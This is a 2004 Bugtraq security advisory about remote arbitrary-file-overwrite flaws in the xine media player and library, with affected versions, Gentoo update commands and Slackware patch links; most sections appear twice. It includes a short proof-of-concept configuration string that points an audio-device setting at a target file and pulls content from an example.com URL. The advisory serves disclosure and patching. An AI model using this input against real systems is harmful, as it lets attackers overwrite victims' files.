Xine And Xine-Lib Multiple Remote File Overwrite Vulnerabilities
BID:10193
Info
Xine And Xine-Lib Multiple Remote File Overwrite Vulnerabilities
| Bugtraq ID: | 10193 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 22 2004 12:00AM |
| Updated: | Apr 22 2004 12:00AM |
| Credit: | The issue was disclosed in the referenced vendor web advisories. |
| Vulnerable: |
xine xine-ui 0.9.23 xine xine-ui 0.9.22 xine xine-ui 0.9.21 xine xine-lib 1-rc3c xine xine-lib 1-rc3b xine xine-lib 1-rc3a xine xine-lib 1-rc2 |
| Not Vulnerable: |
xine xine-ui 0.99.1 |
Discussion
Xine And Xine-Lib Multiple Remote File Overwrite Vulnerabilities
It has been reported that the xine media player and the xine media library are affected by multiple remote file overwrite vulnerabilities. This is due to a design error that allows various media resource file configurations to write to arbitrary files.
It is possible to set these configuration parameters to write to arbitrary files on the affected system. It should be noted that this issue, as it is currently known, only affects Sun based systems as well as those using the DXR3 or Hollywood+ MPEG decoder audio card. It has been conjectured however that similar configuration parameters exists that affect other systems.
It has been reported that the xine media player and the xine media library are affected by multiple remote file overwrite vulnerabilities. This is due to a design error that allows various media resource file configurations to write to arbitrary files.
It is possible to set these configuration parameters to write to arbitrary files on the affected system. It should be noted that this issue, as it is currently known, only affects Sun based systems as well as those using the DXR3 or Hollywood+ MPEG decoder audio card. It has been conjectured however that similar configuration parameters exists that affect other systems.
Exploit / POC
Xine And Xine-Lib Multiple Remote File Overwrite Vulnerabilities
No exploit is required to leverage this issue. The following proof of concept has been provided:
The configuration syntax:
"cfg:/audio.sun_audio_device:targetFile"
If followed by the entry:
"http://www.example.com/attackerSpecifiedFile"
Will cause the attacker specified file to be written to the target file.
No exploit is required to leverage this issue. The following proof of concept has been provided:
The configuration syntax:
"cfg:/audio.sun_audio_device:targetFile"
If followed by the entry:
"http://www.example.com/attackerSpecifiedFile"
Will cause the attacker specified file to be written to the target file.
Solution / Fix
Xine And Xine-Lib Multiple Remote File Overwrite Vulnerabilities
Solution:
The vendor has released advisories XSA-2004-1 and XSA-2004-2 dealing with these issues. Please see the referenced web advisory for more information and details on obtaining fixes.
Slackware Linux has released advisory SSA:2004-111-01 as well as fixes dealing with these issues. Please see the referenced advisory for more information and details on obtaining fixes.
Gentoo has released updates to address this issue. These updates may be applied with the following commands:
# emerge sync
# emerge -pv ">=media-video/xine-ui-0.9.23-r2"
# emerge ">=media-video/xine-ui-0.9.23-r2"
# emerge -pv ">=media-libs/xine-lib-1_rc3-r3"
# emerge ">=media-libs/xine-lib-1_rc3-r3"
xine xine-lib 1-rc3c
xine xine-ui 0.9.21
xine xine-ui 0.9.22
xine xine-ui 0.9.23
Solution:
The vendor has released advisories XSA-2004-1 and XSA-2004-2 dealing with these issues. Please see the referenced web advisory for more information and details on obtaining fixes.
Slackware Linux has released advisory SSA:2004-111-01 as well as fixes dealing with these issues. Please see the referenced advisory for more information and details on obtaining fixes.
Gentoo has released updates to address this issue. These updates may be applied with the following commands:
# emerge sync
# emerge -pv ">=media-video/xine-ui-0.9.23-r2"
# emerge ">=media-video/xine-ui-0.9.23-r2"
# emerge -pv ">=media-libs/xine-lib-1_rc3-r3"
# emerge ">=media-libs/xine-lib-1_rc3-r3"
xine xine-lib 1-rc3c
-
Slackware xine-lib-1rc3c-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/x ine-lib-1rc3c-i686-1.tgz -
Slackware xine-lib-1rc3c-i686-2.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/ xine-lib-1rc3c-i686-2.tgz
xine xine-ui 0.9.21
-
Slackware xine-ui-0.99.1-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/x ine-ui-0.99.1-i686-1.tgz -
Slackware xine-ui-0.99.1-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/ xine-ui-0.99.1-i686-1.tgz
xine xine-ui 0.9.22
-
Slackware xine-ui-0.99.1-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/x ine-ui-0.99.1-i686-1.tgz -
Slackware xine-ui-0.99.1-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/ xine-ui-0.99.1-i686-1.tgz
xine xine-ui 0.9.23
-
Slackware xine-ui-0.99.1-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/x ine-ui-0.99.1-i686-1.tgz -
Slackware xine-ui-0.99.1-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/ xine-ui-0.99.1-i686-1.tgz
References
Xine And Xine-Lib Multiple Remote File Overwrite Vulnerabilities
References:
References:
- xine Homepage (xine)
- XSA-2004-1 - xine security announcement (xine)
- XSA-2004-2 - xine security announcement (xine)